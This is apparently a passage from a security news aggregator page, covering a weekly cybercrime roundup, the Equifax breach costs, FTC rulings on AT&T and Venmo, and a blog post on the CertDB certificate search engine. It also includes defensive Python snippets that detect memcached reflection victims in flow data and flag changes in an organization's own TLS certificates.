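udp 198.51.100.7 11211 203.0.113.10 51234 6200 9300000
udp 198.51.100.8 11211 203.0.113.10 51234 5900 8850000
udp 203.0.113.10 51234 198.51.100.7 11211 1 203
tcp 192.0.2.5 11211 192.0.2.9 40022 12 4800
udp 192.0.2.20 53 203.0.113.10 40000 3 900
udp 198.51.100.9 11211 192.0.2.30 33000 4 600
"""

if __name__ == "__main__":
    for victim, info in reflection_report(parse_flows(FLOWS)).items():
        print(victim, info)
```

The reflector addresses the report lists are the ones a provider would rate-limit on source port 11211, as Akamai suggests above.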
Other trending cybercrime events from the week include:
- W-2 information breached: The University of Alaska said that 50 current and former employees and students had their personal information compromised when hackers gained access to their university accounts by answering security questions and resetting their passwords. The Association for Supervision and Curriculum Development is notifying employees that their W-2 information was compromised due to a spear phishing attack. Wallace Community College Selma said that current and former employees had their W-2 information compromised when an employee fell for a phishing scam. Curtis Lumber is notifying employees that their personal information was stolen in a spear phishing attack, and some of those employees have reported issues related to filing their federal taxes following the incident.
- Ransomware infections continue: The Colorado Department of Transportation said that computers had been reinfected with ransomware eight days after an initial attack. Both the Children’s Aid Society of Oxford County and the Family and Children’s Services of Lanark, Leeds and Grenville in Canada were the victims of a ransomware infection. Jemison Internal Medicine is notifying 6,550 patients of a ransomware infection that may have compromised their personal information.
- Payment card breaches and service disruptions: A number of Tim Hortons locations in Canada were temporarily shut down or were forced to close their drive-throughs after malware was discovered targeting Panasonic cash registers. NIS America said that customers of its online stores had their information compromised due to being redirected to a malicious site that would harvest their information during the checkout process. North 40 is notifying customers that their payment card information may have been compromised due to unauthorized access to its e-commerce website.
- Notable data breaches: A hacker gained access to the intranet of Germany’s government and accessed confidential information. St. Peter’s Surgery and Endoscopy Center is notifying patients that their personal and medical information may have been compromised due to unauthorized access to its servers. Healthcare vendor FastHealth submitted a data breach notification regarding unauthorized access to its web server. Porsche Japan said that the information of customers was exposed due to a hack. Metro Wire Rope Corporation said that an employee email account was compromised after the employee opened a malicious attachment with credential-stealing capabilities. The French news magazine L’Express exposed a database containing the personal information of readers and after being notified of the exposure took a month to secure the data. U.S. Marine Corps Forces Reserve may have compromised the personal information of 21,426 individuals due to sending an unencrypted email with an attachment to the wrong email distribution list.
- Other notable events: The Financial Services Information Sharing and Analysis Center said that one of its employees was successfully phished, and the compromised email account was used to send further phishing messages to other members, affiliates, and employees. The recent hack of the PyeongChang Winter Olympics that led to Internet disruptions and website downtime was a false-flag operation carried out by Russian military spies to make it appear as if the attack was carried out by North Korea, U.S. intelligence officials said. An Arkansas man who developed the remote-access Trojan NanoCore and marketed it on Hack Forums has been sentenced to 33 months in prison.
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
Equifax was back in the news this week after announcing it had discovered an additional 2.4 million U.S. consumers who were affected by its massive 2017 data breach, bringing the total number of people impacted to 147.9 million.
“This is not about newly discovered stolen data,” said Paulino do Rego Barros, Jr., interim chief executive officer, in a press release. “It’s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.”
The company also said that it expects breach-related costs to hit $275 million in 2018, which Reuters noted could make the Equifax breach the most costly hack in corporate history:
The projection, which was disclosed on a Friday morning earnings conference call, is on top of $164 million in pretax costs posted in the second half of 2017. That brings expected breach-related costs through the end of this year to $439 million, some $125 million of which Equifax said will be covered by insurance.
Those breach-related costs could rise further once legal actions from consumers and regulators are finally resolved. However, Sen. Elizabeth Warren recently stated that “Equifax is still making money off their own breach” and that even consumers who do not want to do business with them may end up buying credit protection services from another company who “very well may be using Equifax to do the back office part.”
It’s the same criticism she leveled in January when introducing a bill with Sen. Mark Warner to address problems related to credit agencies collecting data without strict protections in place to secure that information. As CNET noted, if such a bill had been in place at the time of the Equifax breach, the company likely would have faced a fine of at least $14.3 billion.
Everything Old Is New Again – Application Security Weekly #07
This week, Keith and Paul discuss Facebook’s mandatory malware scan, GitLeaks: Check git repos for secrets and keys, New York quietly working to prevent a major cyber attack, and more on this episode of Application Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ASW_Episode07
Visit https://www.securityweekly.com/asw for all the latest episodes!
Ninth Circuit Decision Bolsters FTC Authority Over Internet Service Providers
On February 26, 2018, the United States Court of Appeals for the Ninth Circuit ruled in an en banc decision that the “common carrier” exception in the Federal Trade Commission Act is “activity-based,” and therefore applies only to the extent a common carrier is engaging in common carrier services. The decision has implications for FTC authority over Internet service providers, indicating that the FTC has authority to bring consumer protection actions against such providers to the extent they are engaging in non-common carrier activities. The Federal Communications Commission (“FCC”) has previously ruled that Internet access service is not a common carrier service subject to that agency’s jurisdiction.
The Ninth Circuit’s decision arose from a case brought by the FTC against AT&T Mobility, LLC (“AT&T”), regarding AT&T’s “data-throttling practice,” by which “the company reduced customer broadband data speed without regard to actual network congestion” when a customer’s mobile data usage exceeded a specified limit. The FTC brought an action under Section 5 of the FTC Act, alleging that the practice was unfair and deceptive. AT&T moved to dismiss the action, arguing that it was exempt from the FTC’s Section 5 authority on the basis of the “common carrier exception,” in which “common carriers subject to the Acts to regulate commerce” are exempt from Section 5 enforcement authority. The court held that the common carrier exception is activity based, not “status-based,” and applies only to the extent an entity is engaging in common carrier activities. Accordingly, AT&T could not claim Section 5 exemption based on the argument that its overall status was that of a common carrier, and the Ninth Circuit denied its motion to dismiss. The Chairman of the FCC and Acting Chair of the FTC both expressed approval of the court’s decision.
NIS America hacked: Customer payment card data stolen, $5 off next purchase offered as apology gift
It’s All Uphill From Here – Paul’s Security Weekly #549
This week, Mary Beth Borgwing of Mach37, joins us for an interview! In our second feature interview, Paul speaks with Cybersecurity Journalist Bruce Sussman of SecureWorld! In the news, we have updates from Quickjack, GitHub, the 2018 Olympics, and more on this episode of Paul's Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/Episode549
Visit https://www.securityweekly.com/psw for all the latest episodes!
What is Triada? Data-stealing malware infects over 40 Android models’ firmware while manufacturing
FTC Announces Settlement for Venmo’s Alleged Violations of the GLBA’s Privacy and Safeguards Rules
On February 27, 2018, the Federal Trade Commission (“FTC”) announced an agreement with PayPal, Inc., to settle charges that its Venmo peer-to-peer payment service misled consumers regarding privacy and the extent to which consumers’ financial accounts were secured. This is the second significant FTC settlement in the past three months to address these issues, following the FTC’s action against TaxSlayer, Inc., and it signals a renewed focus by the FTC on violations of the Gramm-Leach-Bliley Act’s (“GLBA’s”) Privacy and Safeguards Rules.
The FTC’s complaint alleged that Venmo violated the Privacy Rule in three separate ways. First, Venmo failed to provide a clear and conspicuous privacy notice that “did not call attention to the nature and significance of the nature of the notice.” Rather, the privacy notice in Venmo’s mobile application (the “Venmo App”) was in grey text on a light grey background that was not conspicuous to Venmo users. Second, Venmo did not provide an accurate notice that describes how Venmo shares the user’s personal information. Venmo’s privacy notice stated that it only shared users’ personal information with members of their Venmo “social web” if they designated their account transactions as “public.” Instead, Venmo shared this information by default with everyone online, including individuals who did not have a Venmo account. Finally, Venmo did not deliver the initial privacy notice in a manner that each customer could reasonably be expected to receive it. The privacy notice was included as a hyperlink in the Venmo App, but users were not required to acknowledge its receipt “as a necessary step to obtaining a financial product or service.”
The FTC complaint also alleged that Venmo misrepresented its information security practices by stating that it “uses bank-grade security systems and data encryption to protect your financial information.” Instead, the FTC alleged that Venmo violated the Safeguards Rule by failing to (1) have a written information security program; (2) assess the risks to the security, confidentiality and integrity of customer information; and (3) implement basic safeguards such as providing security notifications to users that their passwords were changed.
In the settlement, Venmo is prohibited from misrepresenting the level of protection provided by its privacy settings and the extent to which Venmo implements or adheres to a particular level of security. Venmo is also prohibited from violating the Privacy Rule and the Safeguards Rule and is required to obtain biennial third-party assessments of its compliance with these rules for 10 years.
In announcing the settlement, Acting FTC Chairwoman Maureen K. Ohlhausen noted that consumers suffered real harm from Venmo’s misrepresentations and stated that “this case sends a strong message that financial institutions like Venmo need to focus on privacy and security from day one.”
GitHub was hit by a massive 1.35 Tbps DDoS attack – the most powerful ever recorded
Differentiating the Differentiators – Enterprise Security Weekly #81
This week, Paul is joined by Doug White to interview Ferruh Mavituna, Founder and Product Manager of Netsparker! In the news, we have updates from Atos, Trustwave, Radware, and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode81
Visit https://www.securityweekly.com/esw for all the latest episodes!
GandCrab ransomware: How to decrypt and recover your data without paying ransom
AV18-036: Moxa OnCell Security Update
Chafer: Iranian hacking group expands attacks, spying operations on airline firms in Middle East
How to filter and query SSL/TLS certs for intelligence

Recently I noticed a new service/project that is turning a few heads among my peers in the security community: CertDB. It is one of its kind in that it indexes domains’ SSL certificates together with their details, IP records, geo-location, timelines, common names, etc. They describe themselves as an Internet-wide search engine for digital certificates. They have a unique business statement once you understand the different components (search vectors) they are incorporating into this project. I know there are a few transparent cert registries like Certificate Search, but as per their website,
Examining the data hidden in digital certificates provides a lot of insight about business activity in a particular geography or even collaboration between 2 different companies.
I know and agree with them that these insights do come in handy while performing reconnaissance during a security assessment, or while validating the SSL/TLS certificates for your client. It does reflect the fact that maybe a certificate is about to expire, or that new domains have been registered in the same certificate (for example, in the Subject Alternative Name: DNS Name). But when I browsed through their project website, I was surprised by the way they articulated their USP (unique selling point),
For example, the registration of a new unknown domain in Palo Alto hints at a new start-up; switching from the "Wildcard" certificate to "Let's Encrypt" tells us about the organization's budget constraints; issuing a certificate in an organization with domains of another organization speaks about collaboration between companies, or even at an acquisition of one company by another.
Now I am intrigued to write a detailed article on their services, business model, and filters, and even to interview their project team.
Question: Are you curious/interested, and what would you like to ask them? Do leave a comment.
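As an added example (not CertDB’s code or anything from the post above), the following Python script shows the kind of checks the post alludes to, applied to an organization’s own certificates: it compares a previously seen certificate with a newly observed one, in the dict shape that Python’s ssl getpeercert() returns, and flags new SAN names, names under another organization’s domain, an issuer change, a dropped wildcard, and imminent expiry. The two records, the observation date, and the example.test / partner-corp.test names are all constructed for illustration.

```python
import ssl
from datetime import datetime, timezone
# Constructed sample records in the shape returned by ssl.SSLSocket.getpeercert();
# every value here is made up for illustration, not taken from a real certificate.
OBSERVED_AT = datetime(2018, 3, 31, tzinfo=timezone.utc)  # assumed observation time
OLD_CERT = {
    "issuer": ((("organizationName", "Example Commercial CA"),),),
    "subjectAltName": (("DNS", "*.example.test"), ("DNS", "example.test")),
    "notAfter": "Apr 30 23:59:59 2018 GMT",
}
NEW_CERT = {
    "issuer": ((("organizationName", "Let's Encrypt"),),),
    "subjectAltName": (("DNS", "example.test"), ("DNS", "api.example.test"),
                       ("DNS", "portal.partner-corp.test")),
    "notAfter": "Apr  9 12:00:00 2018 GMT",
}

def san_dns_names(cert):
    """DNS names listed in the certificate's Subject Alternative Name extension."""
    return {name for kind, name in cert.get("subjectAltName", ()) if kind == "DNS"}

def issuer_org(cert):
    """organizationName of the issuer, or None if the certificate has none."""
    for rdn in cert.get("issuer", ()):
        for key, value in rdn:
            if key == "organizationName":
                return value
    return None

def days_until_expiry(cert, now):
    """Whole days from `now` (an aware UTC datetime) until the certificate's notAfter."""
    expires = datetime.fromtimestamp(ssl.cert_time_to_seconds(cert["notAfter"]), timezone.utc)
    return (expires - now).days

def certificate_signals(old, new, now, own_suffixes=("example.test",), warn_days=30):
    """Signals of the kind the post describes when `new` replaces the previously seen `old`."""
    signals = []
    added = san_dns_names(new) - san_dns_names(old)
    own = lambda n: any(n == s or n.endswith("." + s) for s in own_suffixes)
    if any(own(n) for n in added):
        signals.append("new SAN entries: " + ", ".join(sorted(n for n in added if own(n))))
    if any(not own(n) for n in added):  # names outside the organization's own domains
        signals.append("SAN entries for another organization: " + ", ".join(sorted(n for n in added if not own(n))))
    if issuer_org(old) != issuer_org(new):
        signals.append(f"issuer changed: {issuer_org(old)} -> {issuer_org(new)}")
    if any(n.startswith("*.") for n in san_dns_names(old)) and not any(n.startswith("*.") for n in san_dns_names(new)):
        signals.append("wildcard certificate replaced by per-host names")
    if days_until_expiry(new, now) < warn_days:
        signals.append(f"expires in {days_until_expiry(new, now)} days")
    return signals
```

A live record in the same shape comes from ssl.create_default_context().wrap_socket(...).getpeercert() on a real connection; store each observation and feed consecutive pairs to certificate_signals().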